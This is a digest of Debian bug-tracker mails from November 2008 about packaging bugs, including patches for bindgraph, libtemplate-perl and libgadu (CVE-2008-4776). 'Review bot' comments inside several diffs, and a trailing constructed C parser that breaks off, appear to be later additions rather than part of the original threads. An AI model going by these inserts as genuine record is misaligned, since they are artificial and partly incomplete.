properly loaded in the 2.4 version you chose to put in lenny instead of 3.0,
and this is worse.
About the final "OR" in my bug report: consider it as a "BESIDE".
3.0 is a must for a new distribution.







Processed: Re: actually a bug in sun java

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> found 504524 6-07-4
Bug#504524: AWT_TOOLKIT=MToolkit causes java to segfault on amd64
Bug marked as found in version 6-07-4.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#504524: actually a bug in sun java

2008-11-05 Thread martin f krafft
found 504524 6-07-4
thanks

The bug also exists with lenny's version.

-- 
 .''`.   martin f. krafft <[EMAIL PROTECTED]>
: :'  :  proud Debian developer, author, administrator, and user
`. `'`   http://people.debian.org/~madduck - http://debiansystem.info
  `-  Debian - when you have better things to do than fixing systems




Bug#504604: openoffice.org-calc: current lenny version do not read files made with 3.0

2008-11-05 Thread Leonardo
Package: openoffice.org-calc
Version: 1:2.4.1-11
Severity: grave
Justification: causes non-serious data loss

Actually: it does not even read files made with 2.3.
I prepared an xls file using a 2.0 version of ooo.
I updated it many times; until about 20 days ago it was ok.
Now it is no longer read.
It does not depend on format (either ods or xls have the same problem);
some cells give error 529.
These are cells that have in the formula:
in R10: IF(T10-Z10<>0;T10-Z10;R$6)
in W10: SUM(R9:R11)

If T10-Z10 evaluates to a non-zero value it is ok; if it is 0
(or better, T10 is empty; Z0 in my files is always empty) instead
it shows the error.
The R$6 cell is actually an empty string.
If I change it to a 0 or an empty cell, the formula returns in R10: [numeric] 0.
Using a previous version or even 3.0, R10 returns an empty string
(so it does not show anything in the display, which was the requirement)
and W10 just the value of (R9+R11), ignoring the empty string value.
Can you fix this behaviour OR as an alternative make 3.0 immediately available
on lenny?
  

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.20-1-686 (SMP w/1 CPU core)
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages openoffice.org-calc depends on:
ii  libc6                     2.7-15       GNU C Library: Shared libraries
ii  libgcc1                   1:4.3.2-1    GCC support library
ii  libstdc++6                4.3.2-1      The GNU Standard C++ Library v3
ii  libstlport4.6ldbl         4.6.2-3.2    STLport C++ class library
ii  libsuitesparse-3.1.0      3.1.0-3      collection of libraries for comput
ii  lp-solve                  5.5.0.10-10  Solve (mixed integer) linear progr
pn  openoffice.org-base-core               (no description available)
pn  openoffice.org-core                    (no description available)

openoffice.org-calc recommends no packages.

openoffice.org-calc suggests no packages.

Versions of packages openoffice.org-core depends on:
ii  fontconfig              2.6.0-1         generic font configuration library
ii  libc6                   2.7-15          GNU C Library: Shared libraries
ii  libcairo2               1.6.4-6.1       The Cairo 2D vector graphics libra
ii  libcurl3                7.18.2-7        Multi-protocol file transfer libra
ii  libdb4.6                4.6.21-11       Berkeley v4.6 Database Libraries [
ii  libexpat1               2.0.1-4         XML parsing C library - runtime li
ii  libfreetype6            2.3.7-2         FreeType 2 font engine, shared lib
ii  libgcc1                 1:4.3.2-1       GCC support library
ii  libglib2.0-0            2.16.6-1        The GLib library of C routines
ii  libgstreamer-plugins-b  0.10.20-1       GStreamer libraries from the "base
ii  libgstreamer0.10-0      0.10.20-1       Core GStreamer libraries and eleme
ii  libgtk2.0-0             2.12.11-4       The GTK+ graphical user interface
ii  libhunspell-1.2-0       1.2.6-1         spell checker and morphological an
ii  libhyphen0              2.4-4           ALTLinux hyphenation library - sha
ii  libice6                 2:1.0.4-1       X11 Inter-Client Exchange library
ii  libicu38                3.8.1-3         International Components for Unico
ii  libjpeg62               6b-14           The Independent JPEG Group's JPEG
ii  libldap-2.4-2           2.4.11-1        OpenLDAP libraries
ii  libneon27               0.28.2-5        An HTTP and WebDAV client library
ii  libnspr4-0d             4.7.1-4         NetScape Portable Runtime Library
ii  libnss3-1d              3.12.0-5        Network Security Service libraries
ii  libpam0g                1.0.1-4         Pluggable Authentication Modules l
ii  libpango1.0-0           1.20.5-3        Layout and rendering of internatio
ii  libsm6                  2:1.0.3-2       X11 Session Management library
pn  libssl0.9.8                             (no description available)
ii  libstdc++6              4.3.2-1         The GNU Standard C++ Library v3
ii  libstlport4.6ldbl       4.6.2-3.2       STLport C++ class library
ii  libx11-6                2:1.1.5-2       X11 client-side library
ii  libxaw7                 2:1.0.4-2       X11 Athena Widget library
ii  libxext6                2:1.0.4-1       X11 miscellaneous extension librar
ii  libxinerama1            2:1.0.3-2       X11 Xinerama extension library
ii  libxml2                 2.6.32.dfsg-4   GNOME XML library
ii  libxrender1             1:0.9.4-2       X Rendering Extension client libra
ii  libxslt1.1              1.1.24-2        XSLT processing library - runtime
ii  libxt6                  1:1.0.5-3       X11 toolkit intrinsics library
ii  libxtst6                2:1.0.3-1       X11 Testing -- Resource extension
pn  openoffice.org-common                   (no description available)
pn  ttf-opensymbol                          (no description avail

Bug#504573: sonata: Sonata fails to start after python upgrade.

2008-11-05 Thread Michal Čihař
Hi

Dne Wed, 05 Nov 2008 16:26:28 +0100
Francesco <[EMAIL PROTECTED]> napsal(a):

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Michal Čihař ha scritto:
> > [..]
> > Okay, so in this case it is not in sonata, but in some of the underlying
> > packages. Most likely it is a python-central issue. Do you remember
> > something from the traceback? If not I'm afraid that there is no way to
> > solve this issue. Maybe it is a duplicate of #489368?
> > 
> > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=489368
> > 
> 
> Maybe it's the same bug, anyway I'm sorry for having wasted your time.

The problem is that you did not provide enough details to debug or fix
the bug. So I will assume it is a duplicate of the above bug as the symptoms
look similar.

-- 
Michal Čihař | http://cihar.com | http://blog.cihar.com




Bug#503205: twitux: Will not connect to twitter.

2008-11-05 Thread Rodrigo Gallardo
On Fri, Oct 24, 2008 at 09:54:22AM +0100, Lawrence Woodman wrote:
> Rodrigo,
> Therefore I started twitux with:
> $ strace -otwitux.strace twitux
> 
> Then clicked on "Connect" from the "Twitter" menu.  Left it for a few
> seconds.  Then clicked on "Quit".
> 
> The strace output is attached.

I think I have reproduced this: Are you using NetworkManager (gnome's
default is yes)? If so, does *it* think the network is active? I think
twitux is asking nm about the network status and silently failing to
do *anything* if the answer from there is "off".






Processed: reassign 504573 to python-central, forcibly merging 489368 504573

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> reassign 504573 python-central
Bug#504573: sonata: Sonata fails to start after python upgrade.
Bug reassigned from package `sonata' to `python-central'.

> forcemerge 489368 504573
Bug#489368: python-gtk: ImportError: No module named cairo
Bug#504573: sonata: Sonata fails to start after python upgrade.
Forcibly Merged 489368 504573.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#504603: libbobcat1: shlibs file fails to reflect ABI additions

2008-11-05 Thread Aaron M. Ucko
Package: libbobcat1
Version: 1.21.1-1
Severity: serious
Justification: Policy 8.6

libbobcat1's shlibs file leads to unversioned dependencies on the
library, which (as demonstrated in #504185) are not always sufficient
given that it's evidently gained new symbols over time.  There are
various ways to fix this issue, depending on how much maintenance
effort you wish to spend and to what extent (if at all) you care
whether dependencies ultimately wind up tighter than strictly
necessary.

In this case, though, I would suggest simply adding -V to your call to
dh_makeshlibs, such that packages built against libbobcat1 always
depend on at least the upstream version against which they were built.
Although that may be overkill in some instances, it has the advantages
of requiring no further maintenance and ensuring that dependencies
will always be sufficiently tight (assuming you never extend the ABI
from one Debian revision of an upstream version to the next).

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/dash

Versions of packages libbobcat1 depends on:
ii  libc6 2.7-16 GNU C Library: Shared libraries
ii  libgcc1   1:4.3.2-1  GCC support library

libbobcat1 recommends no packages.

libbobcat1 suggests no packages.

-- no debconf information






Bug#504447: Additionnal info

2008-11-05 Thread Chris Lamb
Eric Valette wrote:
 
> I do explicitly want the 1.5.2 X server that is available in
> experimental and I also would like that the experimental package play
> nicely with other experimental packages

There is no requirement that experimental packages play nicely with each
other. There is not even a requirement that experimental packages play
nicely at all. Sorry.


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  [EMAIL PROTECTED]
   `-




Bug#504447: marked as done (xserver-xorg-video-nouveau: fails to install due to incompatibilities with current experimental X server)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Wed, 5 Nov 2008 15:18:54 +
with message-id <[EMAIL PROTECTED]>
and subject line Re: Bug#504447: Additionnal info
has caused the Debian Bug report #504447,
regarding xserver-xorg-video-nouveau: fails to install due to incompatibilities 
with current experimental X server
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
504447: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504447
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: xserver-xorg-video-nouveau
Version: 1:0.0.10~git+20081028+cea05e1-1
Severity: grave
Justification: renders package unusable

apt-get -t experimental -s install xserver-xorg-video-nouveau
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.

Since you only requested a single operation it is extremely likely that
the package is simply not installable and a bug report against
that package should be filed.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
  xserver-xorg-video-nouveau: Depends: xserver-xorg-core (>= 2:1.4) but it is 
not going to be installed


I think it is related to xserver-xorg-video-2 (provides in this package and 
conflicts in the other one)

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.27.4 (SMP w/2 CPU cores; PREEMPT)
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash

Versions of packages xserver-xorg-video-nouveau depends on:
ii  drm-modules  2.3.1+git+20081027+1d930fc-1  DRM rendering modules for Linux (k
ii  libc6        2.8+20080809-3                GNU C Library: Shared libraries
ii  xserver-xor  2:1.5.2-1                     Xorg X server - core server

xserver-xorg-video-nouveau recommends no packages.

xserver-xorg-video-nouveau suggests no packages.



--- End Message ---
--- Begin Message ---
Eric Valette wrote:
 
> I do explicitly want the 1.5.2 X server that is available in
> experimental and I also would like that the experimental package play
> nicely with other experimental packages

There is no requirement that experimental packages play nicely with each
other. There is not even a requirement that experimental packages play
nicely at all. Sorry.


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  [EMAIL PROTECTED]
   `-


--- End Message ---


Processed: forcibly merging 496101 504536

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.9.26
> forcemerge 496101 504536
Bug#496101: xserver-xorg-input-all: Logitech MX510: Grab failed (Bad file 
descriptor)
Bug#504536: xserver-xorg: No input possible after log off on sparc
Forcibly Merged 496101 504536.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#503713: Investigating Lenny release blocker bug: #503713

2008-11-05 Thread Sebastiaan Couwenberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

tags 503713 patch
thanks

José Luis Tallón wrote:
> I look forward to your suggestion and/or patch.

Time did not allow me to finish this yesterday, but I managed to finish
up testing the patch today.

I've attached my proposed patch: 

It sources the /etc/default/bindgraph in debian/config if it exists and
uses the DNS_LOG value to set the selection in debconf before prompting.

It also uses a more strict expression to check if the
/etc/default/bindgraph needs to be modified.

mailgraph uses a similar approach, except that it uses all debconf
questions to generate /etc/default/mailgraph and sources it to set the
current values in debconf for all of mailgraph's questions. This may be an
option too; this was my initial approach, but that patch differed too
much from your package as it is now, so I chose this more limited
approach for now.

You probably also want to purge the settings from the debconf database
in debian/postrm with db_purge to start fresh after the package has been
purged.

Regards,

Bas

- --
GnuPG: 0x77A975AD
diff -ruN ../bindgraph-0.2a.old/debian/changelog ../bindgraph-0.2a/debian/changelog
--- ../bindgraph-0.2a.old/debian/changelog	2008-11-04 16:53:40.0 +0100
+++ ../bindgraph-0.2a/debian/changelog	2008-11-04 16:40:13.0 +0100
@@ -1,3 +1,12 @@
+bindgraph (0.2a-3.2) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Change maintainer scripts to preserve changes to /etc/default/bindgraph
+by using those settings (if available) in debconf before prompting.
+(Closes: 503713)
+
+ -- Sebastiaan Couwenberg <[EMAIL PROTECTED]>  Tue, 04 Nov 2008 16:27:47 +0100
+
 bindgraph (0.2a-3.1) unstable; urgency=low
 
   * Non-maintainer upload.
diff -ruN ../bindgraph-0.2a.old/debian/config ../bindgraph-0.2a/debian/config
--- ../bindgraph-0.2a.old/debian/config	2008-11-04 16:53:40.0 +0100
+++ ../bindgraph-0.2a/debian/config	2008-11-05 15:26:51.0 +0100
@@ -12,7 +12,14 @@
 
 case "$1" in
 configure|reconfigure)
- 
+		if [ -f /etc/default/bindgraph ]; then
+			. /etc/default/bindgraph
+
+			if [ -n "$DNS_LOG" ]; then
+db_set bindgraph/logfile "$DNS_LOG"
+			fi
+		fi 		
+
 		db_input medium bindgraph/start_on_boot || true
 		db_go
 
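Review bot: the added `. /etc/default/bindgraph` runs the whole defaults file in the config script's own shell, so a syntax error in a hand-edited file aborts configuration and any variable it sets can shadow the script's own. Reading only DNS_LOG, or sourcing in a subshell and echoing the value back, would limit that. Unlike the `db_input ... || true` line that follows, the new `db_set` has no `|| true`, so if the script runs under `set -e` a failing db_set stops it; the added `fi` line also carries trailing whitespace.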
diff -ruN ../bindgraph-0.2a.old/debian/postinst ../bindgraph-0.2a/debian/postinst
--- ../bindgraph-0.2a.old/debian/postinst	2008-11-04 16:53:40.0 +0100
+++ ../bindgraph-0.2a/debian/postinst	2008-11-05 15:27:05.0 +0100
@@ -60,18 +60,19 @@
 	if [ ! -f $DEFAULTS ]; then
 		echo "DNS_LOG=$LOGFILE" > $DEFAULTS
 		echo "LOG_FORMAT=${log_ver}" >> $DEFAULTS
-		
-	elif [ -z "`grep $LOGFILE $DEFAULTS`" ]; then
+	fi
+	
+	if [ -z "`egrep "^\s*DNS_LOG\s*=\s*$LOGFILE\s*$" $DEFAULTS`" ]; then
 		# update log file location
 		mv $DEFAULTS $DEFAULTS.tmp
-		grep -v DNS_LOG $DEFAULTS.tmp > $DEFAULTS
+		egrep -v "^\s*DNS_LOG\s*=" $DEFAULTS.tmp > $DEFAULTS
 		echo "DNS_LOG=$LOGFILE" >> $DEFAULTS
 		rm -f $DEFAULTS.tmp
 	fi
 	
 	if [ -n "$2" ]; then
 		# if we are upgrading, update config :-)
-		if [ -z "`grep LOG_FORMAT ${DEFAULTS}`" ]; then
+		if [ -z "`egrep "^\s*LOG_FORMAT\s*=" ${DEFAULTS}`" ]; then
 			echo "LOG_FORMAT=${log_ver}" >> $DEFAULTS		
 		fi
 	fi
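Review bot: in the new `egrep "^\s*DNS_LOG\s*=\s*$LOGFILE\s*$"` test, $LOGFILE is expanded into the pattern unescaped, so any regex metacharacter in the path (a dot, for instance) matches more than the literal character, and `\s` is a GNU extension rather than POSIX ERE; `[[:space:]]` is the portable spelling. A value the administrator wrote with quotes, DNS_LOG="...", never matches this pattern, so the file is rewritten on every run. The double quotes nested inside backticks inside double quotes are fragile as well; `$(...)` avoids the problem. The anchored `egrep -v "^\s*DNS_LOG\s*="` is a real improvement over `grep -v DNS_LOG`, which also dropped comment lines that merely mention DNS_LOG.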


Processed: Re: Bug#503713: Investigating Lenny release blocker bug: #503713

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 503713 patch
Bug#503713: overwrittes manually modified /etc/default/bindgraph on upgrade
There were no tags set.
Bug#481103: on upgrade postinstall configuration replaces the modified 
/etc/default/bindgraph
Tags added: patch

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#504149: [Pkg-virtualbox-devel] Bug#504149: virtualbox-ose: symlink

2008-11-05 Thread Michael Meskes
tag 504149 pending
thanks

> I hope our fix is sufficient. The changesets r13788, r13807, r13809,
> r13810 should check the permissions. These changesets should apply
> to 1.6.6 and 2.0 as well.

Thanks a lot Frank. 

I just put a unified patch into our SVN, a new upload will come pretty soon.

Michael

-- 
Michael Meskes
Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
Michael at BorussiaFan dot De, Meskes at (Debian|Postgresql) dot Org
ICQ: 179140304, AIM/Yahoo: michaelmeskes, Jabber: [EMAIL PROTECTED]
Go VfL Borussia! Go SF 49ers! Use Debian GNU/Linux! Use PostgreSQL!






Processed: Re: [Pkg-virtualbox-devel] Bug#504149: virtualbox-ose: symlink

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tag 504149 pending
Bug#504149: virtualbox-ose: symlink vulnerability due to bad /tmp handling
Tags were: security
Tags added: pending

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#504573: sonata: Sonata fails to start after python upgrade.

2008-11-05 Thread Michal Čihař
Dne Wed, 05 Nov 2008 13:42:31 +0100
Francesco <[EMAIL PROTECTED]> napsal(a):

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Michal Čihař ha scritto:
> > Dne Wed, 05 Nov 2008 10:20:47 +0100
> > Francesco Apollonio <[EMAIL PROTECTED]> napsal(a):
> > 
> >> Package: sonata
> >> Version: 1.5.2-2
> >> Severity: grave
> >> Justification: renders package unusable
> >>
> >>
> >> after python upgrade to version 2.5 sonata fails to start.
> > 
> > What does "fail to start" mean? What error do you get?
> > 
> 
> I'm sorry but I don't have the stacktrace. So it was a problem with the
> python libs:
> ii  python-cairo  1.4.12-1.1 Python bindings for the
> Cairo vector graphic
> ii  python-mpd0.2.0-2Python MPD client library
> In fact, after dpkg-reconfigure python-cairo and dpkg-reconfigure
> python-mpd sonata works perfectly.

Okay, so in this case it is not in sonata, but in some of the underlying
packages. Most likely it is a python-central issue. Do you remember
something from the traceback? If not I'm afraid that there is no way to
solve this issue. Maybe it is a duplicate of #489368?

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=489368

-- 
Michal Čihař | http://cihar.com | http://blog.cihar.com




Bug#504536:

2008-11-05 Thread Max Dmitrichenko
Synaptics driver on my laptop also has the same bug. In this light, I
suspect that X server input layer introduces some change which breaks
input drivers.

Can someone with more detailed knowledge of X investigate this problem?






Bug#504589: Download location at debian/copyright is out of date

2008-11-05 Thread Vincent Fourmond
  Hello,

On Wed, Nov 5, 2008 at 1:23 PM, Modestas Vainius <[EMAIL PROTECTED]> wrote:
> According to Debian Policy 12.5 (a MUST hence serious severity):
> 
> In addition, the copyright file must say where the upstream sources (if any)
> were obtained.
> 
> However, http://www.piware.de/projects/ stated in copyright does not contain
> versions beyond 0.9.13. Since Google didn't return anything very obvious at
> first, it took me a while to figure out current upstream sources are hosted
> on Debian's Alioth/Git.

  Good point. What about looking at the debian/watch file ? After all,
that's what it is for, isn't it ?

  Cheers,

  Vincent






Bug#504573: sonata: Sonata fails to start after python upgrade.

2008-11-05 Thread Michal Čihař
Dne Wed, 05 Nov 2008 10:20:47 +0100
Francesco Apollonio <[EMAIL PROTECTED]> napsal(a):

> Package: sonata
> Version: 1.5.2-2
> Severity: grave
> Justification: renders package unusable
> 
> 
> after python upgrade to version 2.5 sonata fails to start.

What does "fail to start" mean? What error do you get?

-- 
Michal Čihař | http://cihar.com | http://blog.cihar.com




Bug#504502: btrfs is WiP

2008-11-05 Thread Riku Voipio
The btrfs-source package description states, and the homepage[1] agrees:

Btrfs is under heavy development, and is not suitable for any uses other
than benchmarking and review. The Btrfs disk format is not yet
finalized.

This is not something we want to release in stable. Remove from lenny
and keep bug open to not let it migrate?

[1] http://btrfs.wiki.kernel.org/index.php/Main_Page


-- 
"rm -rf" only sounds scary if you don't have backups






Bug#504589: Download location at debian/copyright is out of date

2008-11-05 Thread Modestas Vainius
Package: pmount
Version: 0.9.18-1
Severity: serious

Hello,

According to Debian Policy 12.5 (a MUST hence serious severity):

In addition, the copyright file must say where the upstream sources (if any)
were obtained.

However, http://www.piware.de/projects/ stated in copyright does not contain
versions beyond 0.9.13. Since Google didn't return anything very obvious at
first, it took me a while to figure out current upstream sources are hosted
on Debian's Alioth/Git.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (101, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.27-1-amd64 (SMP w/1 CPU core)
Locale: LANG=lt_LT.UTF-8, LC_CTYPE=lt_LT.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages pmount depends on:
ii  libblkid1        1.41.3-1   block device id library
ii  libc6            2.7-16     GNU C Library: Shared libraries
ii  libdbus-1-3      1.2.1-4    simple interprocess messaging syst
ii  libhal-storage1  0.5.11-6   Hardware Abstraction Layer - share
ii  libhal1          0.5.11-6   Hardware Abstraction Layer - share
ii  libsysfs2        2.1.0-5    interface library to sysfs

pmount recommends no packages.

Versions of packages pmount suggests:
ii  cryptsetup  2:1.0.6-6  configures encrypted block devices
ii  hal         0.5.11-6   Hardware Abstraction Layer

-- no debconf information






Bug#504373: Template Toolkit, Template::DBI and Etch updates breakage

2008-11-05 Thread Dominic Hargreaves
On Tue, Nov 04, 2008 at 02:13:16PM -0600, Gunnar Wolf wrote:

> Umh, IMHO it would be way cleaner and better to make this a new
> package. After all, the release team are not robots, and I guess that
> making this a clean solution will look much better in their eyes than
> clumping (hiding even?) a full module inside this package.

Agreed.

ftpmaster, I've just uploaded libtemplate-plugin-dbi-perl to NEW in
order to fix an RC bug in libtemplate-perl (this is a regression from
the functionality in etch; the code is in the main libtemplate-perl
package in etch).

Please could you process this as a lenny-related priority?

Many thanks.
Dominic.

-- 
Dominic Hargreaves | http://www.larted.org.uk/~dom/
PGP key 5178E2A5 from the.earth.li (keyserver,web,email)






Bug#504373: Template Toolkit, Template::DBI and Etch updates breakage

2008-11-05 Thread Dominic Hargreaves
On Wed, Nov 05, 2008 at 12:03:14PM +, Dominic Hargreaves wrote:
> ftpmaster, I've just uploaded libtemplate-plugin-dbi-perl to NEW in
> order to fix an RC bug in libtemplate-perl (this is a regression from
> the functionality in etch; the code is in the main libtemplate-perl
> package in etch).
> 
> Please could you process this as a lenny-related priority?

Further to this, attached is my proposed NMU diff once
libtemplate-plugin-dbi-perl is available. Notice I've moved some other
packages from Suggests to Recommends on the advice of

http://lists.debian.org/debian-release/2008/07/msg00828.html

-- 
Dominic Hargreaves | http://www.larted.org.uk/~dom/
PGP key 5178E2A5 from the.earth.li (keyserver,web,email)
diff -u libtemplate-perl-2.19/debian/control libtemplate-perl-2.19/debian/control
--- libtemplate-perl-2.19/debian/control
+++ libtemplate-perl-2.19/debian/control
@@ -11,7 +11,8 @@
 Provides: templatetoolkit-perl
 Conflicts: libtemplate-stash-perl
 Replaces: libtemplate-stash-perl
-Suggests: libtemplate-perl-doc, libtemplate-plugin-gd-perl, libtemplate-plugin-xml-perl
+Suggests: libtemplate-perl-doc
+Recommends: libtemplate-plugin-gd-perl, libtemplate-plugin-xml-perl, libtemplate-plugin-dbi-perl
 Description: template processing system written in perl
  The Template Toolkit is a fast, powerful, flexible, and easily
  extensible template processing system written in Perl. It is ideally
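Review bot: the new `Recommends:` line names libtemplate-plugin-dbi-perl, which according to the accompanying mail has only just been uploaded to NEW, so this NMU should not go out before that package is accepted or the Recommends cannot be satisfied. Moving libtemplate-plugin-gd-perl and libtemplate-plugin-xml-perl from Suggests to Recommends also means default installs now pull in both plugins; the changelog entry records this, but it is worth confirming that the extra packages are acceptable for a testing-proposed-updates upload.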
diff -u libtemplate-perl-2.19/debian/changelog libtemplate-perl-2.19/debian/changelog
--- libtemplate-perl-2.19/debian/changelog
+++ libtemplate-perl-2.19/debian/changelog
@@ -1,3 +1,14 @@
+libtemplate-perl (2.19-1.1lenny1.1) testing-proposed-updates; urgency=medium
+
+  * Non-maintainer upload
+  * Urgency medium due to RC bug fix
+  * Add Recommends: libtemplate-plugin-dbi-perl, and move
+libtemplate-plugin-xml-perl and libtemplate-plugin-gd-perl from
+Suggests to Recommends, to smooth upgrades from etch to lenny.
+Closes: #504373
+
+ -- Dominic Hargreaves <[EMAIL PROTECTED]>  Wed, 05 Nov 2008 11:55:40 +
+
 libtemplate-perl (2.19-1.1lenny1) testing-proposed-updates; urgency=low
 
   * Non-maintainer upload





Bug#504200: Extra data point

2008-11-05 Thread Neil Muller
On i386, it doesn't segfault if using the -Write_Phonemes option or
the undocumented -Write_Klatt option, but does segfault when using
-Write_Ulaw, so the error looks to be in the conversion from the klatt
representation to ulaw.


-- 
Neil Muller






Bug#504429: marked as done (kadu: CVE-2008-4776 remote DoS)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Wed, 05 Nov 2008 10:02:04 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#504429: fixed in kadu 0.6.0.2-3
has caused the Debian Bug report #504429,
regarding kadu: CVE-2008-4776 remote DoS
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
504429: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504429
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: kadu
Severity: grave
Tags: security patch

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for kadu.

CVE-2008-4776[0]:
| libgadu before 1.8.2 allows remote servers to cause a denial of
| service (crash) via a contact description with a large length, which
| triggers a buffer over-read.

You seem to embed libgadu and thus suffer from the same
problem. The patch for gadu which applies to the sources is
attached.

If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.

For further information see:

[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4776
http://security-tracker.debian.net/tracker/CVE-2008-4776

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
diff -pruN libgadu-1.8.1/src/events.c libgadu-1.8.2/src/events.c
--- libgadu-1.8.1/src/events.c	2008-06-17 22:29:54.0 +0200
+++ libgadu-1.8.2/src/events.c	2008-10-24 00:24:04.0 +0200
@@ -1,4 +1,4 @@
-/* $Id: events.c 610 2008-05-31 22:18:03Z wojtekka $ */
+/* $Id: events.c 639 2008-10-23 22:24:01Z wojtekka $ */
 
 /*
  *  (C) Copyright 2001-2006 Wojtek Kaniewski <[EMAIL PROTECTED]>
@@ -621,7 +621,7 @@ static int gg_watch_fd_connected(struct 
 if (GG_S_D(n->status)) {
 	unsigned char descr_len = *((char*) n + sizeof(struct gg_notify_reply77));
 
-	if (descr_len < length) {
+	if (sizeof(struct gg_notify_reply77) + descr_len <= length) {
 		if (!(e->event.notify60[i].descr = malloc(descr_len + 1))) {
 			gg_debug_session(sess, GG_DEBUG_MISC, "// gg_watch_fd_connected() not enough memory for notify data\n");
 			goto fail;
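Review bot: the new bound `sizeof(struct gg_notify_reply77) + descr_len <= length` does not count the length byte itself, which the line above reads from offset sizeof(struct gg_notify_reply77). If the description is copied starting at the byte after that (the copy is outside this hunk), the condition needs to be `sizeof(struct gg_notify_reply77) + 1 + descr_len <= length`. The read of descr_len also happens before anything in the visible lines confirms that length is larger than sizeof(struct gg_notify_reply77); please check that the enclosing code guarantees it.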
@@ -744,7 +744,7 @@ static int gg_watch_fd_connected(struct 
 if (GG_S_D(n->status)) {
 	unsigned char descr_len = *((char*) n + sizeof(struct gg_notify_reply60));
 
-	if (descr_len < length) {
+	if (sizeof(struct gg_notify_reply60) + descr_len <= length) {
 		if (!(e->event.notify60[i].descr = malloc(descr_len + 1))) {
 			gg_debug_session(sess, GG_DEBUG_MISC, "// gg_watch_fd_connected() not enough memory for notify data\n");
 			goto fail;
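Review bot: this is the same bound as in the gg_notify_reply77 branch, repeated with a different struct, so the two copies can drift apart in a later fix; a small helper taking the header size, descr_len and length would keep them in step. The length byte is also read through `(char*)` and then stored in an `unsigned char`; reading it through `unsigned char *` states the intent directly and avoids the detour through a possibly signed type.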


pgp6vU4rwEbPz.pgp
Description: PGP signature
--- End Message ---
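The CVE text quoted in the report above describes a length-prefixed description field being read past the end of the received data. The following C parser is an added example, not code from libgadu or kadu: it checks the header, the length byte and the description against the bytes remaining before it copies anything. The header struct, the field layout and all function names are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for a fixed-size notify-reply header. The real
 * library's struct layout is not shown on this page. */
struct reply_hdr {
    uint32_t uin;
    uint8_t  status;
    uint8_t  reserved[3];
};

#define HDR_SIZE (sizeof(struct reply_hdr))

/* Bytes one record occupies: header, one length byte, description. */
static size_t bytes_needed(unsigned char descr_len)
{
    return HDR_SIZE + 1 + (size_t)descr_len;
}

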